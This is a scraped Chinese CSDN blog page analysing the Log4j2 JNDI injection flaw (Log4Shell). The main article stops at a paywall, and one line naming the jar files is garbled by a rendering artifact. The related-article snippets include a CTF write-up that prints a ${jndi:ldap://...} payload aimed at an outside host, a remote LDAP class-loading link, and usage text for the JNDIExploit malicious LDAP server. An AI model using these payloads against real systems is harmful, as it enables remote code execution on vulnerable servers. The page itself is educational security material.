Log4j2的JNDI注入漏洞原理分析与思考

最新推荐文章于 2024-01-29 16:43:53 发布
最新推荐文章于 2024-01-29 16:43:53 发布
阅读量441 收藏 1
点赞数
分类专栏: Java 文章标签: 经验分享 架构 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69745415/article/details/124593228
版权

因为存在前身Log4j,而且都是Apache下的项目,不管是jar包名称还是package名称,看起来都很相似,导致有些人分不清自己用的是Log4j还是Log4j2。这里给出几个辨别方法:

  1. Log4j2分为2个jar包,一个是接口 log4j-api- 版 本 号 . j a r   , 一 个 是 具 体 实 现   l o g 4 j − c o r e − {版本号}.jar ,一个是具体实现 log4j-core- .jar  log4jcore{版本号}.jar 。Log4j只有一个jar包 log4j-${版本号}.jar 。

  2. Log4j2的版本号目前均为2.x。Log4j的版本号均为1.x。

  3. Log4j2的package名称前缀为 org.apache.logging.log4j 。Log4j的package名称前缀为 org.apache.log4j 。

1.2 Log4j2 Lookup

=================

Log4j2的Lookup主要功能是通过引用一些变量,往日志中添加动态的值。这些变量可以是外部环境变量,也可以是MDC中的变量,还可以是日志上下文数据等。

下面是一个简单的Java Lookup例子和输出:

import org.apache.logging.log4j.LogManager;

import org.apache.logging.log4j.Logger;

import org.apache.logging.log4j.ThreadContext;

public class Log4j2Lookup {

pu

最低0.47元/天 解锁文章
明斯克开源
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Log4j2的JNDI注入漏洞(CVE-2021-44228)
黑白的博客
10-13 4999
好好学习,天天向上。
JAVA安全之Log4j-Jndi注入原理以及利用方式
qq_53058639的博客
05-29 689
JDNI(Java Naming and Directory Interface)是Java命名和目录接口,它提供了统一的访问命名和目录服务的API。JDNI主要通过JNDI SPI(Service ProviderInterface)规范来实现,该规范定义了对JNDI提供者应实现的接口。在JNDI体系中,JNDI提供者是指实际提供命名和目录服务的软件组件。JNDISPI规范包含了多个接口,其中最为重要的是Context接口。
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5158
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
引爆全球的 Log4j2 核弹级漏洞JNDI 到底是个什么鬼?
Java技术栈,分享最主流的Java技术
01-10 439
背景 前段时间,Log4j2, Logback 日志框架频频爆雷: 炸了!Log4j2 再爆漏洞,v2.17.1 横空出世。。。 Logback 也爆雷了,惊爆了。。。 究其原因,很大一部分就是因为 JNDI 这个玩意。。。 JNDI JNDI:Java Naming and Directory Interface,即:Java 命名和目录接口,它专为 Java 应用程序提供命名和目录功能。 JNDI 架构图: 如图,JNDI 包含以下两部分: 1)JNDI API: Java 应用程序即是通过 J
记录一次针对log4j的jndi注入攻击
大兵的博客
12-16 3542
事件经过 今天一到公司就被钉钉监控报警群@了,报错类型如下图所示: com.mysql.jdbc.MysqlDataTruncation:Data truncation:Data too long for column这个错误很常见,就是插入数据到数据库中,字段长度超过了数据库限制的长度。 于是我就去skywalking上找日志,看到底是什么参数超过了长度限制,于是我找到了报错的链路看到了网关打印的日志信息如下: 重点看我红线框出的部分,这一看就不是一个正常的传参,看起来像是某种攻击。 由此让我联想到,
Apache Log4j2 远程代码执行漏洞检测工具
12-15
然而,在2021年12月初,一个严重的安全漏洞(CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码,对受影响的系统造成...
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查 Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决...
log4j log4j2 2.15.0漏洞解决
12-10
Log4j2中的JNDI(Java Naming and Directory Interface)注入漏洞,源于其对用户输入的日志字符串未进行充分的过滤和转义。攻击者可以通过在日志消息中插入特定格式的字符串,触发JNDI查找,进而执行任意代码,实现...
Log4j漏洞的学习与分析-思维导图
最新发布
06-09
Log4j漏洞的学习与分析,主要包含对log4j漏洞的简介,影响范围,以及相关额排查方法等做一个学习记录,另外还有相关的如:LDAP,JNDI等内容的学习
log4j2_rce 项目
02-23
然而,2021年,研究人员发现了一个严重的漏洞,被称为“Log4Shell”,它源于Log4j2中的JNDI(Java Naming and Directory Interface)注入。这个漏洞允许攻击者通过操纵日志记录消息来执行任意远程代码,从而对受影响...
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
Log4j2与JNDI结合
cloud的技术积累
06-04 4412
Log4j2和JNDI结合指定配置文件路径和日志文件
JNDI注入漏洞原理和复现
Locosomnus的博客
01-29 1565
一篇关于JNDI注入的学习笔记
应用安全系列之十四:JNDI引用注入
jimmyleeee的专栏
03-09 864
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 如果有不妥之处,希望可以留言指出。谢谢! ...
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用
wutiangui的博客
09-07 1779
再开一个cmd可以看下能用什么payload。以上payload都可以尝试,我们使用。Windows攻击端执行以下命令。请求包中增加cmd:whoami。1.首先搭建log4j靶场。执行后发现命令可以执行。
核弹级漏洞,我把log4j底裤都给扒了
MachineGunJoe666
12-12 1078
大家好,我是周杰伦。 相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂**:这个注定会载入网络安全史册上的漏洞,到底是怎么一回事!** log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,
JNDI注入-RMI&LDAP服务(详细完整原理篇,小白也能看得懂)
qq_68064663的博客
09-14 1140
使用jndi注入工具:JNDI-Injection-Exploit可以生成远程调用链接ldap://47.94.236.117:1389/nx5qkh,ldap://47.94.236.117:1389/nx5qkh:执行远程地址的一个class文件,功能:调用47.94.236.117的计算器。JNDI是java系统自带的api,用于访问ldap,rmi...的api,ldap和rmi是JNDI内置接口,他们这些接口可以远程调用执行一些文件,文件中可以命令执行,如调用计算器。Injection和。
Log4j2_RCE漏洞复现
kukudeshuo的博客
12-20 1741
Log4j2_RCE漏洞复现 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html 复现过程 首先这里需要一台外网VPS服务器,然后在上面安装JNDI注入工具 打开题目 先使用dnslog进行测试 ${jndi:ldap://2c7b25a4.xxxxx.ceye.io/exp} 填在账号输入的位置即可,密码随便填 然后点击提交 可以看到笔者这边的dnslog平台成功返回一条记录,说明存在Log4j2_RCE漏洞 开启ldap和http服务
log4j2漏洞原理
07-28
log4j2漏洞是指Apache Log4j2框架中存在的一个安全漏洞,该漏洞被称为"Log4Shell"或"CVE-2021-44228"。该漏洞原理是由于log4j2框架在处理日志消息时,会自动解析并执行包含特定JNDI注入代码的日志消息。这意味着攻击者可以通过构造恶意的日志消息,利用JNDI注入来执行任意的远程命令。具体来说,攻击者可以在日志消息中使用JNDI注入表达式,通过远程JNDI服务器加载恶意的类或执行任意的命令。 这个漏洞的危害非常严重,攻击者可以通过发送恶意的日志消息来远程执行任意代码,可能导致服务器被完全控制,数据泄露,或者其他恶意行为。该漏洞已经被广泛利用,并且已经影响了许多应用程序和系统。 需要注意的是,log4j2漏洞只存在于使用了受影响版本的log4j2框架的应用程序中。为了解决这个漏洞,建议开发人员升级到log4j2的安全版本,并采取其他安全措施,如配置安全策略、限制日志消息的内容等,以减少潜在的风险。 #### 引用[.reference_title] - *1* *3* [log4j2漏洞原理漏洞环境搭建复现](https://blog.csdn.net/dreamthe/article/details/123230283)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [一文读懂面试官都在问的Log4J2漏洞](https://blog.csdn.net/YangYubo091699/article/details/130087573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值